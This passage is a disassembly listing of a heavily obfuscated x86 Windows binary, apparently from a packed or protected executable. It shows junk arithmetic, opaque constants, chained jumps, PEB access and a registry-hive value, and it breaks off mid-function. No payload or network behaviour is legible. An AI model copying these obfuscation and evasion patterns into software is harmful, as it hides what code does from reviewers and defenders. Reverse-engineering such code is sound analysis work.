loc_423FEC: ; CODE XREF: sub_422EB0:loc_4224C5�j
push 15F46E30h
pop eax
xor eax, 0FF9C8F12h
push offset loc_425656
jmp nullsub_38
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_424002: ; CODE XREF: sub_42C24F:loc_422B01�j
sub edx, ecx
shl edi, 7
not esi
pop edi
popf
jmp loc_42518F
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
loc_424010: ; CODE XREF: _94j21ax3:loc_424763�j
push ebx
mov [esp], eax
call sub_42A61F
push eax
mov eax, [ebp-8]
push eax
call sub_42A61F
push eax
jmp loc_42A558
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B77
loc_424029: ; CODE XREF: sub_425B77:loc_42300D�j
push edx
push 0EFCE64F8h
pop edx
sub edx, 88A60E83h
add edx, 9919EDD3h
jmp loc_42248D
; END OF FUNCTION CHUNK FOR sub_425B77
; ---------------------------------------------------------------------------
loc_424041: ; CODE XREF: _94j21ax3:004227D7�j
test ecx, edx
jmp loc_4236CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_424048: ; CODE XREF: sub_42284F+6648�j
cdq
add ebx, 0D3DA58C9h
mov edx, [ecx]
jmp loc_4236F8
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
dw 932Eh
dd 0F38AFBBBh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_42405C: ; CODE XREF: sub_425819+11�j
jmp loc_426C14
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4225A5
loc_424061: ; CODE XREF: sub_4225A5+D35�j
jmp loc_429CEC
; END OF FUNCTION CHUNK FOR sub_4225A5
; ---------------------------------------------------------------------------
dw 0C5B1h
dword_424068 dd 6EFCE62Ch ; DATA XREF: _94j21ax3:00429749�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_42406C: ; CODE XREF: sub_425790+6896�j
jmp loc_427FE3
; END OF FUNCTION CHUNK FOR sub_425790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A68
loc_424071: ; CODE XREF: sub_427A68+1B�j
jmp loc_42A741
; END OF FUNCTION CHUNK FOR sub_427A68
; ---------------------------------------------------------------------------
dw 4F22h
dword_424078 dd 0E77E737Dh ; DATA XREF: _94j21ax3:0042504C�w
dword_42407C dd 0 ; DATA XREF: sub_42A254:loc_421F45�r
; sub_427D53+7�r
dword_424080 dd 0 ; DATA XREF: sub_42BA8A:loc_425A77�r
; sub_4254AE+F54�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB0D
loc_424084: ; CODE XREF: sub_42BB0D+6�j
jmp loc_4213C4
; END OF FUNCTION CHUNK FOR sub_42BB0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_424089: ; CODE XREF: sub_42A277-8FCA�j
jmp sub_423F43
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
dw 0F202h
dword_424090 dd 0D2A3BF30h ; DATA XREF: sub_4272E9-5DA1�r
; sub_42237C+B�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_424094: ; CODE XREF: sub_423324+631�j
jmp nullsub_82
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
db 84h, 0C8h, 1
dword_42409C dd 0DDDF9C1Ah ; DATA XREF: sub_424B54+2281�w
; sub_42A8BB:loc_42B092�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236E2
loc_4240A0: ; CODE XREF: sub_4236E2+6�j
jmp nullsub_20
; END OF FUNCTION CHUNK FOR sub_4236E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425983
loc_4240A5: ; CODE XREF: sub_425983+3135�j
sub ebp, 0F8B07658h
loc_4240AB: ; CODE XREF: sub_425983:loc_424806�j
call sub_426612
mov edx, 0BD91ED44h
call sub_4239A5
push eax
ror eax, 0Ch
call sub_426602
; END OF FUNCTION CHUNK FOR sub_425983
; =============== S U B R O U T I N E =======================================
sub_4240C3 proc near ; CODE XREF: sub_42AD91+A�p
; sub_42266A+9CCF�j
arg_0 = dword ptr 4
mov [esp+0], ecx
pop ecx
xchg ecx, [esp-4+arg_0]
jmp sub_4210AA
sub_4240C3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_4240CF: ; CODE XREF: sub_42C057:loc_428293�j
mov ds:dword_426F2C, eax
; END OF FUNCTION CHUNK FOR sub_42C057
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_4240D4: ; CODE XREF: sub_42AA5F-246A�j
call sub_42574E
call sub_422034
; END OF FUNCTION CHUNK FOR sub_42AA5F
; START OF FUNCTION CHUNK FOR sub_422FBC
loc_4240DE: ; CODE XREF: sub_422FBC+7�j
jmp loc_428DDC
; END OF FUNCTION CHUNK FOR sub_422FBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_4240E3: ; CODE XREF: sub_424C37+4F45�j
jz loc_4223C9
jmp loc_427737
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
sbb ecx, 2D7131D4h
jmp loc_42B719
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_4240F9: ; CODE XREF: sub_424A57+5CD1�j
pop eax
mov eax, ds:dword_42340C
or eax, eax
jnz loc_42A4D2
jmp loc_423C67
; END OF FUNCTION CHUNK FOR sub_424A57
; ---------------------------------------------------------------------------
loc_42410D: ; CODE XREF: _94j21ax3:loc_422810�j
cdq
jmp loc_4297EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426C7A
loc_424113: ; CODE XREF: sub_426C7A:loc_426C90�j
mov eax, [ebp-4]
call sub_42ABCE
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jle loc_42C454
mov eax, [ebp-4]
xor edx, edx
jmp loc_4297E5
; END OF FUNCTION CHUNK FOR sub_426C7A
; ---------------------------------------------------------------------------
test al, al
jz loc_424149
mov eax, 0E1h
call sub_425A09
jmp loc_42242C
; ---------------------------------------------------------------------------
loc_424149: ; CODE XREF: _94j21ax3:00424134�j
call sub_426AFD
; START OF FUNCTION CHUNK FOR sub_427CAC
loc_42414E: ; CODE XREF: sub_427CAC:loc_428BA7�j
push 100h
lea eax, [ebp-2C8h]
push eax
push 4C91A0h
mov eax, [ebp-10h]
push eax
call sub_42A3EE
test eax, eax
jmp loc_42B818
; END OF FUNCTION CHUNK FOR sub_427CAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_42416F: ; CODE XREF: sub_4221B8:loc_42901D�j
jz loc_4271B5
jmp loc_42AAF3
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42328F
loc_42417A: ; CODE XREF: sub_42328F+11�j
xchg ecx, [esp+0]
jmp loc_4267B4
; END OF FUNCTION CHUNK FOR sub_42328F
; ---------------------------------------------------------------------------
mov edx, 0BE8CE1B7h
call sub_4239A5
mov [ebp-4], eax
jmp loc_42ADAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428118
loc_424194: ; CODE XREF: sub_428118+1�j
push 160CB763h
pop ecx
add ecx, 0EA356FC2h
xchg ecx, [esp+4+var_4]
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_428118
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_4241A8: ; CODE XREF: sub_422392:loc_421AE9�j
popf
rol ebx, 17h
jmp loc_4211D8
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4241B1: ; CODE XREF: sub_4294B3:loc_42BEB4�j
; DATA XREF: sub_428811+13�o
mov dword ptr [eax], 737361h
push 0
lea eax, [ebp-20h]
push eax
call sub_42B83A
mov [ebp-8], eax
jmp loc_422133
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425868
loc_4241CA: ; CODE XREF: sub_425868:loc_424E49�j
; sub_425868-A14�j
add eax, 0FD3E3D87h
xchg eax, [esp+0]
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_425868
; =============== S U B R O U T I N E =======================================
sub_4241D8 proc near ; CODE XREF: sub_423F55+8D0�p
; _94j21ax3:00424D48�j
mov [esp+0], ecx
pop ecx
jmp nullsub_21
sub_4241D8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_4241E1: ; CODE XREF: sub_423F55:loc_424811�j
; sub_423F55+8CA�j
jnz loc_424C50
mov eax, [ebp-4]
call sub_4225B5
jmp loc_422C43
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4241F4: ; CODE XREF: sub_421D33+5�j
mov ebp, esp
jnz sub_42134B
add esp, 0FFFFFFE0h
loc_4241FF: ; CODE XREF: sub_423FCD:loc_422AB3�j
push 49E5C53h
pop eax
or eax, 76E0891Ch
jmp loc_4220A6
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
ror ecx, 9
jmp sub_425790
; ---------------------------------------------------------------------------
loc_424218: ; CODE XREF: _94j21ax3:loc_426CCA�j
pop eax
and eax, 0CD3433Ch
add eax, 0EF9A9BE4h
call sub_426DA4
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_42422A: ; CODE XREF: sub_428B5E-1C3E�j
jge loc_424443
xor eax, ebp
loc_424232: ; CODE XREF: sub_428B5E:loc_42301D�j
call sub_426612
push 339E5FE7h
pop edx
xor edx, 14E0A1B0h
push ebx
jmp loc_42BE06
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4228FF
loc_424249: ; CODE XREF: sub_4228FF+7�j
add esp, 4
push 232E24D2h
pop eax
or eax, 9977D041h
test eax, 4
jmp loc_424582
; END OF FUNCTION CHUNK FOR sub_4228FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_424263: ; CODE XREF: sub_4294B3-4084�j
ror esi, 5
jmp loc_42388D
; END OF FUNCTION CHUNK FOR sub_4294B3
; =============== S U B R O U T I N E =======================================
sub_42426B proc near ; CODE XREF: _94j21ax3:00428F29�j
; sub_4248E7+6EA7�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 00421D5D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004230A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423314 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042503D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428247 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042A544 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B00F SIZE 0000001C BYTES
xchg esi, [esp+18h+var_18]
pop esi
push 0BBA18EB2h
pop edx
xor edx, 83BA7A98h
add edx, 37A69FFFh
add edx, ebp
add edx, 903D6BD3h
jmp loc_423314
sub_42426B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_42BF31
; START OF FUNCTION CHUNK FOR sub_429447
loc_424293: ; CODE XREF: sub_429447-6F62�j
jmp loc_4274B6
; END OF FUNCTION CHUNK FOR sub_429447
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D65
loc_424298: ; CODE XREF: sub_427D65-62E3�j
rol edi, 0Bh
sub esi, ebp
mov eax, edx
loc_42429F: ; CODE XREF: sub_427D65:loc_4247C6�j
mov eax, 80000002h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_423D6F
; END OF FUNCTION CHUNK FOR sub_427D65
; ---------------------------------------------------------------------------
locret_4242AF: ; CODE XREF: _94j21ax3:loc_425ACB�j
retn
; ---------------------------------------------------------------------------
loc_4242B0: ; CODE XREF: _94j21ax3:loc_4287B4�j
mov [ecx], eax
pop ecx
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jnz loc_42B954
jmp loc_422070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_4242C4: ; CODE XREF: sub_421142:loc_4227A7�j
; sub_424A57:loc_424A5F�j
jz sub_423EAE
push ebp
jmp loc_42A71E
; END OF FUNCTION CHUNK FOR sub_424A57
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42445A
loc_4242D0: ; CODE XREF: sub_42445A+8�j
pop ebx
pop eax
pop ecx
; END OF FUNCTION CHUNK FOR sub_42445A
; START OF FUNCTION CHUNK FOR sub_428F6D
loc_4242D3: ; CODE XREF: sub_428F6D+271D�j
xchg ebp, [esp+0]
mov edx, ebp
pop ebp
pop ebp
jmp loc_426485
; END OF FUNCTION CHUNK FOR sub_428F6D
; ---------------------------------------------------------------------------
push ebp
jmp loc_425635
; ---------------------------------------------------------------------------
loc_4242E5: ; DATA XREF: sub_42B052+7�o
mov eax, 52h
call sub_425A09
jmp loc_42AF1F
; ---------------------------------------------------------------------------
jmp loc_4255FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_4242F9: ; CODE XREF: sub_42C0BC:loc_42C36D�j
mov eax, large fs:30h
add eax, 54h
; END OF FUNCTION CHUNK FOR sub_42C0BC
; START OF FUNCTION CHUNK FOR sub_427A68
loc_424303: ; CODE XREF: sub_427A68-4AFF�j
mov eax, [eax]
or eax, eax
jmp loc_423337
; END OF FUNCTION CHUNK FOR sub_427A68
; =============== S U B R O U T I N E =======================================
sub_42430C proc near ; CODE XREF: sub_425395�j
; DATA XREF: sub_4272B2-1F27�o
; FUNCTION CHUNK AT 00423556 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00423A28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428CDA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428FF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042977A SIZE 00000013 BYTES
xchg eax, [esp+0]
xchg ecx, esi
mov esp, ebp
pop ebp
mov eax, ds:dword_42C1FC
jmp loc_423556
sub_42430C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424320 proc near ; CODE XREF: sub_422401+9�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00422092 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00423DC7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00424FAB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427195 SIZE 0000000B BYTES
xchg edx, [esp+0]
mov edx, [esp+0]
call sub_42A791
loc_42432B: ; CODE XREF: _94j21ax3:0042BBCB�j
jmp loc_427195
sub_424320 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A33
loc_424330: ; CODE XREF: sub_423A33+1E�j
jmp loc_421353
; END OF FUNCTION CHUNK FOR sub_423A33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42983E
loc_424335: ; CODE XREF: sub_42983E:loc_428BD9�j
call sub_42AD91
loc_42433A: ; CODE XREF: sub_4228FF+50FB�j
jmp nullsub_99
; END OF FUNCTION CHUNK FOR sub_42983E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851E
loc_42433F: ; CODE XREF: sub_42851E-5086�j
add ecx, 0EBC0D047h
call sub_42BDD7
loc_42434A: ; CODE XREF: sub_427D53+2EA0�j
jmp loc_42B5BC
; END OF FUNCTION CHUNK FOR sub_42851E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422898
loc_42434F: ; CODE XREF: sub_422898-917�j
jmp loc_42385B
; END OF FUNCTION CHUNK FOR sub_422898
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_424354: ; CODE XREF: sub_42284F+A5C�j
jz loc_421776
loc_42435A: ; CODE XREF: _94j21ax3:0042B7A4�j
jmp loc_428361
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A268
loc_42435F: ; CODE XREF: sub_42A268+86E�j
jmp loc_428278
; END OF FUNCTION CHUNK FOR sub_42A268
; ---------------------------------------------------------------------------
loc_424364: ; CODE XREF: _94j21ax3:004276F5�j
jmp loc_42C070
; ---------------------------------------------------------------------------
loc_424369: ; CODE XREF: _94j21ax3:00427299�j
jmp loc_4216EB
; ---------------------------------------------------------------------------
adc ebp, edi
push 0FAF47DA8h
jz loc_423B87
and eax, ebx
jmp loc_421776
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_424382: ; CODE XREF: sub_4294B3+2A07�j
; DATA XREF: _94j21ax3:00428CEF�o
add ebx, 3FF75B82h
push offset sub_423754
jmp locret_42BF09
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BE2
loc_424392: ; CODE XREF: sub_429BE2-2688�j
and eax, 0A3C01800h
add eax, 0DE025BD0h
mov eax, [eax]
call sub_423F43
mov esp, ebp
mov ebp, offset sub_42874B
xchg ebp, [esp+0]
jmp nullsub_164
; END OF FUNCTION CHUNK FOR sub_429BE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4243B4: ; CODE XREF: sub_423324:loc_426F05�j
jnz loc_42BEC6
jmp loc_4223DB
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_4243BF: ; CODE XREF: sub_42169F+671B�j
pop esi
and esi, 0E9D290DAh
test esi, 2
jmp loc_42AC87
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_4243D1: ; CODE XREF: sub_422048+1�j
mov ebp, esp
js loc_4271AB
add esp, 0FFFFFFE4h
mov [ebp-8], edx
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
jmp loc_4220B2
; END OF FUNCTION CHUNK FOR sub_422048
; ---------------------------------------------------------------------------
cdq
jmp sub_42B3E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4243F2: ; CODE XREF: sub_423324+82C3�j
push 0
push 10h
push 0E4D58032h
pop eax
xor eax, 38017336h
add eax, ebp
jmp loc_4219FD
; END OF FUNCTION CHUNK FOR sub_423324
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42440A: ; CODE XREF: _94j21ax3:00422CBC�j
jnz loc_42B4C1
jmp loc_427FA7
; ---------------------------------------------------------------------------
mov [ebp+0], ebx
jmp sub_423F7F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42454E
loc_42441D: ; CODE XREF: sub_42454E:loc_421271�j
jz loc_42B755
jmp loc_4252A9
; END OF FUNCTION CHUNK FOR sub_42454E
; ---------------------------------------------------------------------------
push eax
push offset sub_429D05
jmp locret_426789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_424433: ; CODE XREF: sub_4294B3:loc_426D06�j
jnz loc_42BEC6
jmp loc_4287FF
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
mov edx, 0C8005F03h
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_424443: ; CODE XREF: sub_428B5E:loc_42422A�j
jmp sub_42C03F
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
mov [ebp-10h], eax
cmp dword ptr [ebp-10h], 0
jz loc_42A3E2
jmp loc_4258C0
; =============== S U B R O U T I N E =======================================
sub_42445A proc near ; CODE XREF: sub_42AE5A-33FC�p
; _94j21ax3:0042A63A�j
; FUNCTION CHUNK AT 004242D0 SIZE 00000003 BYTES
mov [esp+0], ebx
pop ebx
shl edx, 1
or edx, ecx
jmp loc_4242D0
sub_42445A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424467 proc near ; CODE XREF: sub_421CAA+7�p
mov [esp+0], eax
retn
sub_424467 endp
; =============== S U B R O U T I N E =======================================
sub_42446B proc near ; CODE XREF: sub_421644+2B5�p
; sub_429D9A+D�j
push offset sub_424B01
jmp nullsub_22
sub_42446B endp
; =============== S U B R O U T I N E =======================================
sub_424475 proc near ; CODE XREF: sub_421402:loc_42141C�j
; _94j21ax3:00424D36�p
; FUNCTION CHUNK AT 004235BB SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
call sub_42574E
push offset sub_42ACBB
jmp loc_4235BB
sub_424475 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424488: ; CODE XREF: _94j21ax3:loc_4275D5�j
jnz loc_42489F
jns loc_4277D5
adc ebp, eax
add ecx, 0F4324B22h
or eax, edx
jmp loc_42489F
; ---------------------------------------------------------------------------
loc_4244A3: ; CODE XREF: _94j21ax3:0042800B�j
xor ebx, ecx
; =============== S U B R O U T I N E =======================================
sub_4244A5 proc near ; CODE XREF: sub_423F55-1DB7�p
; FUNCTION CHUNK AT 004221F6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004230FB SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_423F37
jmp loc_4230FB
sub_4244A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4244BB proc near ; DATA XREF: sub_42848B-71F1�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004221EA SIZE 00000005 BYTES
push edi
call sub_4273AE
loc_4244C1: ; DATA XREF: _94j21ax3:0042272A�o
push eax
push 18491C04h
pop eax
add eax, 0E7F996E2h
xchg eax, [esp+4+var_4]
jmp loc_4221EA
sub_4244BB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4244D6: ; CODE XREF: sub_421402+46�j
; DATA XREF: _94j21ax3:0042856D�o
mov ds:dword_422274, eax
; END OF FUNCTION CHUNK FOR sub_421402
; START OF FUNCTION CHUNK FOR sub_421F28
loc_4244DB: ; CODE XREF: sub_421F28+978E�j
push 0BF0216E7h
xchg ecx, [esp+0]
mov eax, ecx
pop ecx
and eax, 2F16FCB1h
jmp loc_421882
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427668
loc_4244F1: ; CODE XREF: sub_427668+324D�j
cmp ebx, 2AA4C703h
jmp loc_4271E0
; END OF FUNCTION CHUNK FOR sub_427668
; ---------------------------------------------------------------------------
loc_4244FC: ; CODE XREF: _94j21ax3:00421CF9�j
xchg ecx, ebx
loc_4244FE: ; CODE XREF: _94j21ax3:loc_421CEE�j
or ebx, 4C8D4E5Dh
add ebx, 23B29F91h
mov [ebx], eax
pop ebx
jmp locret_428711
; ---------------------------------------------------------------------------
loc_424512: ; DATA XREF: sub_421689:loc_421D09�o
call dword ptr [ebp-4]
neg eax
sbb eax, eax
neg eax
mov [ebp-5], al
jmp loc_424DD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_424523: ; CODE XREF: sub_422C48-C94�j
jz loc_428777
; END OF FUNCTION CHUNK FOR sub_422C48
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_424529: ; CODE XREF: sub_42C0BC:loc_421F9D�j
and ebx, ds:4000F2h
xor ebx, 113B4210h
test eax, ebx
pop ebx
jz loc_42C36D
jmp loc_427384
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A254
loc_424543: ; CODE XREF: sub_42A254:loc_425068�j
jz loc_42BD9C
jmp loc_427BBD
; END OF FUNCTION CHUNK FOR sub_42A254
; =============== S U B R O U T I N E =======================================
sub_42454E proc near ; CODE XREF: _94j21ax3:00421E9A�j
; sub_422392+944�p
; FUNCTION CHUNK AT 00421271 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422EEA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042441D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004252A9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004279BC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428437 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ADE8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042B752 SIZE 00000020 BYTES
mov [esp+0], eax
pop eax
pop ebp
mov eax, ds:dword_424090
or eax, eax
jnz loc_42ADE8
jmp loc_421271
sub_42454E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4227F5
loc_424566: ; CODE XREF: sub_4227F5:loc_4212F0�j
add esi, 0F046AE70h
mov [esi], eax
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_4227F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42780F
loc_424570: ; CODE XREF: sub_42780F-4271�j
jmp loc_42ACCA
; END OF FUNCTION CHUNK FOR sub_42780F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_424575: ; CODE XREF: sub_425819+259�j
pop ecx
xchg eax, [esp+0]
mov ebx, eax
pop eax
pop edx
jmp loc_422312
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4228FF
loc_424582: ; CODE XREF: sub_4228FF+195F�j
jz loc_4259E3
loc_424588: ; CODE XREF: _94j21ax3:00423E4E�j
jmp loc_4279F0
; END OF FUNCTION CHUNK FOR sub_4228FF
; ---------------------------------------------------------------------------
xchg esi, ebx
jmp loc_42923C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_424594: ; CODE XREF: sub_422C48:loc_425A20�j
shl ebp, 0Ah
push ebx
jge loc_429549
jmp loc_426BAD
; END OF FUNCTION CHUNK FOR sub_422C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289B3
loc_4245A3: ; CODE XREF: sub_4289B3+175F�j
xor [ebp-4], eax
cmp dword ptr [ebp-4], 0
setnz byte ptr [ebp-9]
mov al, [ebp-9]
mov esp, ebp
mov ebp, offset nullsub_1
xchg ebp, [esp+0]
jmp nullsub_94
; END OF FUNCTION CHUNK FOR sub_4289B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424839
loc_4245C0: ; CODE XREF: sub_424839+312D�j
; sub_424839:loc_429D1F�j
call sub_421D33
retn
; END OF FUNCTION CHUNK FOR sub_424839
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_4245C6: ; CODE XREF: sub_429862-47F2�j
jmp loc_427A14
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426AFD
loc_4245CB: ; CODE XREF: sub_426AFD+4�j
call sub_424902
; END OF FUNCTION CHUNK FOR sub_426AFD
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_4245D0: ; CODE XREF: sub_4249A9+2412�j
jmp loc_425035
; END OF FUNCTION CHUNK FOR sub_4249A9
; ---------------------------------------------------------------------------
loc_4245D5: ; CODE XREF: _94j21ax3:loc_423D85�j
mov ebp, esp
push ebx
push ecx
mov ecx, eax
xchg ecx, [esp]
jmp loc_42C07B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_4245E3: ; CODE XREF: sub_42169F+A�j
pop eax
pop ecx
pop ebp
jmp loc_426485
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4245EB: ; CODE XREF: sub_42284F:loc_42571D�j
add ecx, 48788AFEh
jmp loc_42A50C
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_4245F7: ; CODE XREF: sub_423F55+B6C�j
push 0B6A00195h
pop esi
xor esi, 0E6978B93h
or esi, 9978CA3h
add esi, 0A6487169h
xchg esi, [esp+4+var_4]
pushf
jmp loc_424A91
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42269A
loc_424618: ; CODE XREF: sub_42269A+F�j
pop ecx
rol ecx, 17h
test ecx, 4000000h
jmp loc_428757
; END OF FUNCTION CHUNK FOR sub_42269A
; =============== S U B R O U T I N E =======================================
sub_424627 proc near ; DATA XREF: _94j21ax3:0042176C�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004217CD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428B54 SIZE 00000005 BYTES
